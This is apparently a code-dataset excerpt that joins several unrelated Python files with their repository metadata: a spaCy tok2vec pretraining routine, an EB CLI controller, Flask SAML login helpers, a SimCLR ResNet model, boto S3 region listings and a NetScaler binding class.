            # JSON can't serialise Path objects; store plain strings instead.
            config[key] = str(config[key])
    msg = Printer()
    util.fix_random_seed(seed)
    has_gpu = prefer_gpu()
    if has_gpu:
        import torch
        torch.set_default_tensor_type("torch.cuda.FloatTensor")
    msg.info("Using GPU" if has_gpu else "Not using GPU")
    output_dir = Path(output_dir)
    if not output_dir.exists():
        output_dir.mkdir()
        msg.good("Created output directory")
    srsly.write_json(output_dir / "config.json", config)
    msg.good("Saved settings to config.json")
    # Load texts from file or stdin
    if texts_loc != "-":
        texts_loc = Path(texts_loc)
        if not texts_loc.exists():
            msg.fail("Input text file doesn't exist", texts_loc, exits=1)
        with msg.loading("Loading input texts..."):
            texts = list(srsly.read_jsonl(texts_loc))
        if not texts:
            msg.fail("Input file is empty", texts_loc, exits=1)
        msg.good("Loaded input texts")
        random.shuffle(texts)
    else:  # reading from stdin
        msg.text("Reading input text from stdin...")
        texts = srsly.read_jsonl("-")
    with msg.loading("Loading model '{}'...".format(vectors_model)):
        nlp = util.load_model(vectors_model)
    msg.good("Loaded model '{}'".format(vectors_model))
    pretrained_vectors = None if not use_vectors else nlp.vocab.vectors.name
    model = create_pretraining_model(
        nlp,
        Tok2Vec(
            width,
            embed_rows,
            conv_depth=depth,
            pretrained_vectors=pretrained_vectors,
            bilstm_depth=bilstm_depth,  # Requires PyTorch. Experimental.
            subword_features=not use_chars,  # Set to False for Chinese etc
            cnn_maxout_pieces=cnn_pieces,  # If set to 1, use Mish activation.
        ),
    )
    # Load in pretrained weights
    if init_tok2vec is not None:
        components = _load_pretrained_tok2vec(nlp, init_tok2vec)
        msg.text("Loaded pretrained tok2vec for: {}".format(components))
        # Parse the epoch number from the given weight file
        model_name = re.search(r"model\d+\.bin", str(init_tok2vec))
        if model_name:
            # Default weight file name so read epoch_start from it by cutting off 'model' and '.bin'
            epoch_start = int(model_name.group(0)[5:][:-4]) + 1
        else:
            if not epoch_start:
                msg.fail(
                    "You have to use the '--epoch-start' argument when using a renamed weight file for "
                    "'--init-tok2vec'",
                    exits=True,
                )
            elif epoch_start < 0:
                msg.fail(
                    "The argument '--epoch-start' has to be greater or equal to 0. '%d' is invalid"
                    % epoch_start,
                    exits=True,
                )
    else:
        # Without '--init-tok2vec' the '--epoch-start' argument is ignored
        epoch_start = 0
    optimizer = create_default_optimizer(model.ops)
    tracker = ProgressTracker(frequency=10000)
    msg.divider("Pre-training tok2vec layer - starting at epoch %d" % epoch_start)
    row_settings = {"widths": (3, 10, 10, 6, 4), "aligns": ("r", "r", "r", "r", "r")}
    msg.row(("#", "# Words", "Total Loss", "Loss", "w/s"), **row_settings)
    def _save_model(epoch, is_temp=False):
        # Write the tok2vec weights (averaged parameters) plus a log line.
        is_temp_str = ".temp" if is_temp else ""
        with model.use_params(optimizer.averages):
            with (output_dir / ("model%d%s.bin" % (epoch, is_temp_str))).open(
                "wb"
            ) as file_:
                file_.write(model.tok2vec.to_bytes())
            log = {
                "nr_word": tracker.nr_word,
                "loss": tracker.loss,
                "epoch_loss": tracker.epoch_loss,
                "epoch": epoch,
            }
            with (output_dir / "log.jsonl").open("a") as file_:
                file_.write(srsly.json_dumps(log) + "\n")
    skip_counter = 0
    for epoch in range(epoch_start, n_iter + epoch_start):
        for batch_id, batch in enumerate(
            util.minibatch_by_words(((text, None) for text in texts), size=batch_size)
        ):
            docs, count = make_docs(
                nlp,
                [text for (text, _) in batch],
                max_length=max_length,
                min_length=min_length,
            )
            skip_counter += count
            loss = make_update(
                model, docs, optimizer, objective=loss_func, drop=dropout
            )
            progress = tracker.update(epoch, loss, docs)
            if progress:
                msg.row(progress, **row_settings)
                # When streaming from stdin, cap an "epoch" at 10M words
                if texts_loc == "-" and tracker.words_per_epoch[epoch] >= 10 ** 7:
                    break
            if n_save_every and (batch_id % n_save_every == 0):
                _save_model(epoch, is_temp=True)
        _save_model(epoch)
        tracker.epoch_loss = 0.0
        if texts_loc != "-":
            # Reshuffle the texts if texts were loaded from a file
            random.shuffle(texts)
    if skip_counter > 0:
        msg.warn("Skipped {count} empty values".format(count=str(skip_counter)))
    msg.good("Successfully finished pretrain")
def make_update(model, docs, optimizer, drop=0.0, objective="L2"):
    """Run one forward/backward pass over a single batch of documents.

    docs (iterable): A batch of `Doc` objects.
    drop (float): The dropout rate.
    optimizer (callable): An optimizer.
    RETURNS loss: A float for the loss.
    """
    output, finish_update = model.begin_update(docs, drop=drop)
    loss, d_output = get_vectors_loss(model.ops, docs, output, objective)
    finish_update(d_output, sgd=optimizer)
    # Cast so callers never receive a cupy scalar.
    return float(loss)
def make_docs(nlp, batch, min_length, max_length):
    """Convert raw JSONL records into `Doc` objects.

    Records carry either pre-tokenized words under "tokens" or raw text under
    "text"; optional "heads" annotations are attached when present.  Records
    with empty text/tokens are skipped and counted.

    RETURNS (docs, skip_count): The docs whose length is within
        [min_length, max_length), plus the number of empty records dropped.
    """
    docs = []
    n_skipped = 0
    for record in batch:
        if not isinstance(record, dict):
            raise TypeError(Errors.E137.format(type=type(record), line=record))
        if "tokens" in record:
            words = record["tokens"]
            if not words:
                n_skipped += 1
                continue
            doc = Doc(nlp.vocab, words=words)
        elif "text" in record:
            text = record["text"]
            if not text:
                n_skipped += 1
                continue
            doc = nlp.make_doc(text)
        else:
            raise ValueError(Errors.E138.format(text=record))
        if "heads" in record:
            # Attach dependency heads as a (n_tokens, 1) uint64 column.
            heads = numpy.asarray(record["heads"], dtype="uint64")
            doc = doc.from_array([HEAD], heads.reshape((len(doc), 1)))
        if min_length <= len(doc) < max_length:
            docs.append(doc)
    return docs, n_skipped
def get_vectors_loss(ops, docs, prediction, objective="L2"):
    """Compute the loss (and its gradient) between the documents' pretrained
    vectors and the model's prediction.
    """
    # Rather than vstacking token.vector (which copies, especially on GPU),
    # gather the vocab-vector row id for every token and index the table once.
    ids = ops.flatten([doc.to_array(ID).ravel() for doc in docs])
    target = docs[0].vocab.vectors.data[ids]
    if objective == "L2":
        d_target = prediction - target
        return (d_target ** 2).sum(), d_target
    if objective == "cosine":
        return get_cossim_loss(prediction, target)
    raise ValueError(Errors.E142.format(loss_func=objective))
def create_pretraining_model(nlp, tok2vec):
    """Define the pretraining network: tok2vec plus a small output head.

    The model predicts each token's static vector from the vocab's vectors
    table, so the output width must equal the vector dimensionality.
    """
    output_size = nlp.vocab.vectors.data.shape[1]
    output_layer = chain(
        LN(Maxout(300, pieces=3)), Affine(output_size, drop_factor=0.0)
    )
    # This is annoying, but the parser etc have the flatten step after
    # the tok2vec. To load the weights in cleanly, we need to match
    # the shape of the models' components exactly, so insert the same
    # flatten step here before stacking the output layer on top.
    tok2vec = chain(tok2vec, flatten)
    model = chain(tok2vec, output_layer)
    model = masked_language_model(nlp.vocab, model)
    # Expose the sub-networks so callers can save/load tok2vec weights alone.
    model.tok2vec = tok2vec
    model.output_layer = output_layer
    # Run one dummy doc through the network so all layer shapes are inferred.
    model.begin_training([nlp.make_doc("Give it a doc to infer shapes")])
    return model
class ProgressTracker(object):
    """Accumulate pretraining loss/word counts and emit periodic status rows."""

    def __init__(self, frequency=1000000):
        self.loss = 0.0
        self.prev_loss = 0.0
        self.nr_word = 0
        # Words seen per epoch; read by the training loop.
        self.words_per_epoch = Counter()
        self.frequency = frequency
        self.last_time = time.time()
        self.last_update = 0
        self.epoch_loss = 0.0

    def update(self, epoch, loss, docs):
        """Fold one batch into the running totals.

        Returns a status tuple every `frequency` words, otherwise None.
        """
        self.loss += loss
        self.epoch_loss += loss
        batch_words = sum(len(doc) for doc in docs)
        self.words_per_epoch[epoch] += batch_words
        self.nr_word += batch_words
        unseen = self.nr_word - self.last_update
        if unseen < self.frequency:
            return None
        wps = unseen / (time.time() - self.last_time)
        self.last_update = self.nr_word
        self.last_time = time.time()
        recent_loss = self.loss - self.prev_loss
        status = (
            epoch,
            self.nr_word,
            _smart_round(self.loss, width=10),
            _smart_round(recent_loss, width=6),
            int(wps),
        )
        self.prev_loss = float(self.loss)
        return status
def _smart_round(figure, width=10, max_decimal=4):
n_digits = len(str(int(figure)))
n_decimal = width - (n_digits + 1)
if n_decimal <= 1:
return str(int(figure))
else:
n_decimal = min(n_decimal, max_decimal)
format_str = "%." + str(n_decimal) + "f"
return format_str % figure
| true | true |
f7236f96ecf229c2c3cc9f3243a298fecf810335 | 3,143 | py | Python | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2018-04-19T19:56:53.000Z | 2021-06-28T19:53:41.000Z | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 1 | 2017-04-27T12:06:05.000Z | 2017-04-27T12:06:05.000Z | venv/lib/python2.7/site-packages/ebcli/core/base.py | zwachtel11/fruitful-backend | 45b8994917182e7b684b9e25944cc79c9494c9f3 | [
"MIT"
] | 4 | 2016-10-12T23:54:55.000Z | 2020-07-25T23:28:25.000Z | # Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import textwrap
import sys
from cement.core import controller
from ebcli import __version__
from ..resources.strings import strings, flag_text
from ..core import io
class EbBaseController(controller.CementBaseController):
    """
    This is the application base controller.
    It handles eb when no sub-commands are given.
    """
    class Meta:
        label = 'base'
        description = strings['base.info']
        # usage = eb {cmd} --option
        arguments = [
            (['--version'], dict(action='store_true',
                                 help=flag_text['base.version'])),
        ]
        epilog = strings['base.epilog']

    @controller.expose(hide=True)
    def default(self):
        """Entry point when no sub-command is given: print the version when
        --version was passed, otherwise show the general help text."""
        if self.app.pargs.version:
            io.echo(strings['app.version_message'], __version__,
                    '(Python', sys.version[0:5] + ')')
        else:
            self.app.args.print_help()

    @property
    def _help_text(self):
        """Returns the help text displayed when '--help' is passed."""
        longest = 0

        def pad(label):
            # Pad so every command's help column lines up with the longest
            # command name.
            padlength = longest - len(label) + 2
            padding = ' '
            if padlength < 0:
                for x in range(0, longest):
                    padding += ' '
            else:
                for x in range(0, padlength):
                    padding += ' '
            return padding

        help_txt = ''
        # First pass: find the longest command name so descriptions align.
        for label in self._visible_commands:
            if len(label) > longest:
                longest = len(label)
        for label in self._visible_commands:
            cmd = self._dispatch_map[label]
            cmd_txt = '  '
            if len(cmd['aliases']) > 0 and cmd['aliases_only']:
                if len(cmd['aliases']) > 1:
                    # Show the first alias as the command name and the rest
                    # as alternatives.  Read-only access here: the previous
                    # implementation pop(0)'d the shared dispatch map, which
                    # corrupted it for any later help rendering.
                    first = cmd['aliases'][0]
                    cmd_txt += "%s (alias: %s)\n" % \
                               (first, ', '.join(cmd['aliases'][1:]))
                else:
                    # BUG FIX: this previously read cmd['alias'][0]; 'alias'
                    # is not a key in the dispatch map and raised KeyError.
                    cmd_txt += "%s" % cmd['aliases'][0]
            elif len(cmd['aliases']) > 0:
                cmd_txt += "%s (alias: %s)\n" % (label, ', '.join(cmd['aliases']))
            else:
                cmd_txt += label
            if cmd['help']:
                cmd_txt += pad(cmd_txt) + "%s\n" % cmd['help']
            else:
                cmd_txt += "\n"
            help_txt += cmd_txt

        if len(help_txt) > 0:
            txt = '''%s
commands:
%s
''' % (self._meta.description, help_txt)
        else:
            txt = self._meta.description
        return textwrap.dedent(txt)
import textwrap
import sys
from cement.core import controller
from ebcli import __version__
from ..resources.strings import strings, flag_text
from ..core import io
class EbBaseController(controller.CementBaseController):
class Meta:
label = 'base'
description = strings['base.info']
arguments = [
(['--version'], dict(action='store_true',
help=flag_text['base.version'])),
]
epilog = strings['base.epilog']
@controller.expose(hide=True)
def default(self):
if self.app.pargs.version:
io.echo(strings['app.version_message'], __version__,
'(Python', sys.version[0:5] + ')')
else:
self.app.args.print_help()
@property
def _help_text(self):
longest = 0
def pad(label):
padlength = longest - len(label) + 2
padding = ' '
if padlength < 0:
for x in range(0, longest):
padding += ' '
else:
for x in range(0, padlength):
padding += ' '
return padding
help_txt = ''
for label in self._visible_commands:
if len(label) > longest:
longest = len(label)
for label in self._visible_commands:
cmd = self._dispatch_map[label]
cmd_txt = ' '
if len(cmd['aliases']) > 0 and cmd['aliases_only']:
if len(cmd['aliases']) > 1:
first = cmd['aliases'].pop(0)
cmd_txt += "%s (alias: %s)\n" % \
(first, ', '.join(cmd['aliases']))
else:
cmd_txt += "%s" % cmd['alias'][0]
elif len(cmd['aliases']) > 0:
cmd_txt += "%s (alias: %s)\n" % (label, ', '.join(cmd['aliases']))
else:
cmd_txt += label
if cmd['help']:
cmd_txt += pad(cmd_txt) + "%s\n" % cmd['help']
else:
cmd_txt += "\n"
help_txt += cmd_txt
if len(help_txt) > 0:
txt = '''%s
commands:
%s
''' % (self._meta.description, help_txt)
else:
txt = self._meta.description
return textwrap.dedent(txt) | true | true |
f7237035cf836f6dcb5fc1c148dcd2432f440406 | 2,212 | py | Python | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 1 | 2019-11-13T11:52:47.000Z | 2019-11-13T11:52:47.000Z | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 106 | 2017-10-25T14:41:07.000Z | 2021-09-20T10:39:57.000Z | etsin_finder/auth/authentication_direct_proxy.py | CSCfi/etsin-finder | d21acf2459da6ce1f45b1d8e508e418e467852ab | [
"MIT"
] | 6 | 2019-03-20T06:55:25.000Z | 2020-02-03T11:26:19.000Z | # This file is part of the Etsin service
#
# Copyright 2017-2018 Ministry of Education and Culture, Finland
#
# :author: CSC - IT Center for Science Ltd., Espoo Finland <servicedesk@csc.fi>
# :license: MIT
"""Direct authentication related functionalities"""
from urllib.parse import urlparse
from flask import session, current_app
from onelogin.saml2.auth import OneLogin_Saml2_Auth
def get_saml_auth(flask_request, service):
    """Build an SP SAML instance from a raw Flask request.

    Args:
        flask_request (object): flask.Request
        service (str): Service suffix used to select the SAML config path.

    Returns:
        object: SP SAML instance.
    """
    prepared = prepare_flask_request_for_saml(flask_request, service)
    base_path = current_app.config.get(('SAML_PATH' + service), None)
    return OneLogin_Saml2_Auth(prepared, custom_base_path=base_path)
def init_saml_auth(saml_prepared_flask_request, service):
    """Initialize the SP SAML instance from an already-prepared request.

    Args:
        saml_prepared_flask_request (object): Prepared flask request.
        service (str): Service suffix used to select the SAML config path.

    Returns:
        object: Initialized SP SAML instance.
    """
    base_path = current_app.config.get(('SAML_PATH' + service), None)
    return OneLogin_Saml2_Auth(saml_prepared_flask_request,
                               custom_base_path=base_path)
def is_authenticated_through_direct_proxy():
    """Check whether the user authenticated through the old proxy solution.

    Returns:
        bool: True if the session carries non-empty SAML user data.
    """
    # Return the boolean expression directly instead of the previous
    # if/return-True/return-False dance; semantics are unchanged.
    return ('samlUserdata' in session
            and len(session.get('samlUserdata', None)) > 0)
def prepare_flask_request_for_saml(request, service):
    """Translate a Flask request into the dict python3-saml expects.

    Args:
        request (object): flask.Request
        service (str): Service identifier (unused here; kept so the
            signature matches its callers).

    Returns:
        dict: Request data.
    """
    parsed = urlparse(request.url)
    # Behind proxies/balancers the host must come from shared configuration
    # rather than the request itself.
    data = {'https': 'on' if request.scheme == 'https' else 'off'}
    data['http_host'] = current_app.config.get('SHARED_DOMAIN_NAME_FOR_PROXY')
    data['server_port'] = parsed.port
    data['script_name'] = request.path
    data['get_data'] = request.args.copy()
    data['post_data'] = request.form.copy()
    return data
def reset_flask_session_on_login():
    """Reset Flask session on login.

    Clears any pre-login state, then marks the session permanent so it is
    subject to the app's configured session lifetime.
    """
    session.clear()
    session.permanent = True
def reset_flask_session_on_logout():
    """Reset Flask session on logout, dropping all stored user data."""
    session.clear()
from urllib.parse import urlparse
from flask import session, current_app
from onelogin.saml2.auth import OneLogin_Saml2_Auth
def get_saml_auth(flask_request, service):
return OneLogin_Saml2_Auth(prepare_flask_request_for_saml(flask_request, service), custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def init_saml_auth(saml_prepared_flask_request, service):
return OneLogin_Saml2_Auth(saml_prepared_flask_request, custom_base_path=current_app.config.get(('SAML_PATH' + service), None))
def is_authenticated_through_direct_proxy():
if ('samlUserdata' in session and len(session.get('samlUserdata', None)) > 0):
return True
return False
def prepare_flask_request_for_saml(request, service):
url_data = urlparse(request.url)
return {
'https': 'on' if request.scheme == 'https' else 'off',
'http_host': current_app.config.get('SHARED_DOMAIN_NAME_FOR_PROXY'),
'server_port': url_data.port,
'script_name': request.path,
'get_data': request.args.copy(),
'post_data': request.form.copy()
}
def reset_flask_session_on_login():
session.clear()
session.permanent = True
def reset_flask_session_on_logout():
session.clear() | true | true |
f723714fb358806aa9a8ab80e838af445bd65bde | 959 | py | Python | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | 2 | 2021-12-22T15:18:02.000Z | 2022-03-10T11:46:38.000Z | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | null | null | null | simclr/model.py | k-stacke/ssl-pathology | d440ce11712a5c1b6631d698dc3cafe7c04e2786 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.cuda import amp
from torchvision.models import resnet50
class Identity(nn.Module):
    """Pass-through module; forwards its input unchanged."""

    def __init__(self):
        super().__init__()

    def forward(self, inputs):
        return inputs
class Model(nn.Module):
    """SimCLR network: ResNet-50 backbone plus a 2-layer projection head."""

    def __init__(self, feature_dim=128, pretrained=False):
        super(Model, self).__init__()
        # Backbone: ResNet-50 with its classification layer replaced by a
        # pass-through, so it yields the 2048-d pooled features.
        self.f = resnet50(pretrained=pretrained)
        self.f.fc = Identity()
        # Projection head g(.): 2048 -> 512 -> feature_dim.
        self.g = nn.Sequential(
            nn.Linear(2048, 512, bias=False),
            nn.BatchNorm1d(512),
            nn.ReLU(inplace=True),
            nn.Linear(512, feature_dim, bias=True),
        )

    @amp.autocast()
    def forward(self, x):
        features = torch.flatten(self.f(x), start_dim=1)
        projection = self.g(features)
        # Both outputs are L2-normalized along the last dimension.
        return F.normalize(features, dim=-1), F.normalize(projection, dim=-1)
| 29.96875 | 70 | 0.590198 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.cuda import amp
from torchvision.models import resnet50
class Identity(nn.Module):
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
class Model(nn.Module):
def __init__(self, feature_dim=128, pretrained=False):
super(Model, self).__init__()
self.f = resnet50(pretrained=pretrained)
self.f.fc = Identity()
self.g = nn.Sequential(nn.Linear(2048, 512, bias=False),
nn.BatchNorm1d(512),
nn.ReLU(inplace=True),
nn.Linear(512, feature_dim, bias=True))
@amp.autocast()
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
| true | true |
f7237157da0e8ce2915b5be1a4e908166945d727 | 3,708 | py | Python | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | boto/s3/__init__.py | adastreamer/boto | ce472cbbcffd06298fdd0c980d5bfcdcee875498 | [
"MIT"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo
class S3RegionInfo(RegionInfo):
    """RegionInfo variant whose connect() passes the endpoint as ``host``."""

    def connect(self, **kw_params):
        """
        Connect to this Region's endpoint. Returns a connection
        object pointing to the endpoint associated with this region.
        You may pass any of the arguments accepted by the connection
        class's constructor as keyword arguments and they will be
        passed along to the connection object.

        :rtype: Connection object
        :return: The connection to this regions endpoint, or None when no
            connection class is configured.
        """
        if not self.connection_cls:
            return None
        return self.connection_cls(host=self.endpoint, **kw_params)
def regions():
    """
    Get all available regions for the Amazon S3 service.

    :rtype: list
    :return: A list of :class:`boto.regioninfo.RegionInfo`
    """
    from .connection import S3Connection
    # (name, endpoint) pairs for every S3 region known to this release.
    endpoints = [
        ('us-east-1', 's3.amazonaws.com'),
        ('us-gov-west-1', 's3-us-gov-west-1.amazonaws.com'),
        ('us-west-1', 's3-us-west-1.amazonaws.com'),
        ('us-west-2', 's3-us-west-2.amazonaws.com'),
        ('ap-northeast-1', 's3-ap-northeast-1.amazonaws.com'),
        ('ap-southeast-1', 's3-ap-southeast-1.amazonaws.com'),
        ('ap-southeast-2', 's3-ap-southeast-2.amazonaws.com'),
        ('eu-west-1', 's3-eu-west-1.amazonaws.com'),
        ('sa-east-1', 's3-sa-east-1.amazonaws.com'),
    ]
    return [S3RegionInfo(name=name, endpoint=endpoint,
                         connection_cls=S3Connection)
            for name, endpoint in endpoints]
def connect_to_region(region_name, **kw_params):
    """Connect to the named S3 region, or return None if it is unknown."""
    match = next((r for r in regions() if r.name == region_name), None)
    if match is None:
        return None
    return match.connect(**kw_params)
| 42.136364 | 74 | 0.629989 |
from boto.regioninfo import RegionInfo
class S3RegionInfo(RegionInfo):
def connect(self, **kw_params):
if self.connection_cls:
return self.connection_cls(host=self.endpoint, **kw_params)
def regions():
from .connection import S3Connection
return [S3RegionInfo(name='us-east-1',
endpoint='s3.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-gov-west-1',
endpoint='s3-us-gov-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-1',
endpoint='s3-us-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='us-west-2',
endpoint='s3-us-west-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-northeast-1',
endpoint='s3-ap-northeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-1',
endpoint='s3-ap-southeast-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='ap-southeast-2',
endpoint='s3-ap-southeast-2.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='eu-west-1',
endpoint='s3-eu-west-1.amazonaws.com',
connection_cls=S3Connection),
S3RegionInfo(name='sa-east-1',
endpoint='s3-sa-east-1.amazonaws.com',
connection_cls=S3Connection),
]
def connect_to_region(region_name, **kw_params):
for region in regions():
if region.name == region_name:
return region.connect(**kw_params)
return None
| true | true |
f72371642afbe55c7e8291b7b219c446c8a26353 | 4,069 | py | Python | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | nitro-python/nssrc/com/citrix/netscaler/nitro/resource/config/feo/feopolicy_binding.py | culbertm/NSttyPython | ff9f6aedae3fb8495342cd0fc4247c819cf47397 | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2008-2016 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class feopolicy_binding(base_resource):
    """Binding class showing the resources that can be bound to feopolicy_binding."""

    def __init__(self):
        self._name = None
        self.feopolicy_csvserver_binding = []
        self.feopolicy_lbvserver_binding = []
        self.feopolicy_feoglobal_binding = []

    @property
    def name(self):
        r"""The name of the front end optimization policy.<br/>Minimum length = 1."""
        return self._name

    @name.setter
    def name(self, name):
        r"""The name of the front end optimization policy.<br/>Minimum length = 1"""
        self._name = name

    @property
    def feopolicy_csvserver_bindings(self):
        r"""csvserver that can be bound to feopolicy."""
        return self._feopolicy_csvserver_binding

    @property
    def feopolicy_lbvserver_bindings(self):
        r"""lbvserver that can be bound to feopolicy."""
        return self._feopolicy_lbvserver_binding

    @property
    def feopolicy_feoglobal_bindings(self):
        r"""feoglobal that can be bound to feopolicy."""
        return self._feopolicy_feoglobal_binding

    def _get_nitro_response(self, service, response):
        r"""Convert a nitro response into resource objects.

        Raises nitro_exception on API-level errors and clears the session
        when the API reports error code 444 (session expired).
        """
        result = service.payload_formatter.string_to_resource(
            feopolicy_binding_response, response, self.__class__.__name__)
        if result.errorcode != 0:
            if result.errorcode == 444:
                service.clear_session(self)
            if result.severity:
                if result.severity == "ERROR":
                    raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
            else:
                raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
        return result.feopolicy_binding

    def _get_object_name(self):
        r"""Return the value of the object identifier argument."""
        if self.name is not None:
            return str(self.name)
        return None

    @classmethod
    def get(self, service, name="", option_=""):
        r"""Use this API to fetch feopolicy_binding resource(s).

        *name* may be empty (fetch all), a single policy name, or a list of
        policy names.
        """
        try:
            if not name:
                obj = feopolicy_binding()
                response = obj.get_resources(service, option_)
            elif type(name) is not list:
                obj = feopolicy_binding()
                obj.name = name
                response = obj.get_resource(service)
            else:
                # BUG FIX: 'response' was never initialised in this branch,
                # so indexing response[i] raised UnboundLocalError for any
                # list-valued 'name'.
                response = [None] * len(name)
                obj = [feopolicy_binding() for _ in range(len(name))]
                for i in range(len(name)):
                    obj[i].name = name[i]
                    response[i] = obj[i].get_resource(service)
            return response
        except Exception as e:
            raise e
class feopolicy_binding_response(base_response):
    """Envelope object deserialized from a feopolicy_binding API response."""

    def __init__(self, length=1):
        self.errorcode = 0
        self.message = ""
        self.severity = ""
        self.sessionid = ""
        # Pre-allocate one binding object per expected result row.
        self.feopolicy_binding = [feopolicy_binding() for _ in range(length)]
| 29.485507 | 119 | 0.718113 |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class feopolicy_binding(base_resource):
def __init__(self) :
self._name = None
self.feopolicy_csvserver_binding = []
self.feopolicy_lbvserver_binding = []
self.feopolicy_feoglobal_binding = []
@property
def name(self) :
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
try :
self._name = name
except Exception as e:
raise e
@property
def feopolicy_csvserver_bindings(self) :
try :
return self._feopolicy_csvserver_binding
except Exception as e:
raise e
@property
def feopolicy_lbvserver_bindings(self) :
try :
return self._feopolicy_lbvserver_binding
except Exception as e:
raise e
@property
def feopolicy_feoglobal_bindings(self) :
try :
return self._feopolicy_feoglobal_binding
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
try :
result = service.payload_formatter.string_to_resource(feopolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.feopolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def get(self, service, name="", option_="") :
try :
if not name :
obj = feopolicy_binding()
response = obj.get_resources(service, option_)
elif type(name) is not list :
obj = feopolicy_binding()
